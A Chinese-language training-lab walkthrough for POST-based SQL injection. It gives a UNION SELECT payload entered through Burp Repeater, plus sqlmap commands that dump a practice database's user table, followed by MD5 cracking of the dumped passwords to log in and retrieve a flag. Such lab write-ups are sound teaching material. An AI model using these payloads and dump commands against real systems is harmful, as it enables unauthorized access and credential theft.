背景介绍
WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差别不大,一样会存在SQL注入的漏洞。试试吧!
实训目标
1、掌握POST提交数据方式;
2、掌握POST方式的SQL注入;
3、了解MySQL数据库的结构;
4、了解SQL注入产生的原理;
5、了解SQL注入可能产生的地方;
解题方向
通过POST方式进行SQL注入,获取数据库的账户密码;或通过绕过方式进入管理后
步骤
第一种方法
一、我们对登陆界面用BurpSuite抓包,右击抓包界面点击“发送到Repeater”
二、点击重放器,在name=1后输入'union select 1,2,3#,点击发送,直接爆出KEY
第二种方法
一、抓登陆界面的包,复制到一个文件里,用sqlmap跑,输入python3 sqlmap.py -r 存放请求包的文件 –current-db –batch,得到当前数据库名
二,输入python3 sqlmap.py -r 存放请求包的文件 -D mozhe_Discuz_StormGroup --dump –batch,找到用户名和密码
三、MD5解密,在线解密网站https://www.cmd5.com/
四、输入用户名和解密的密码,登陆发现KEY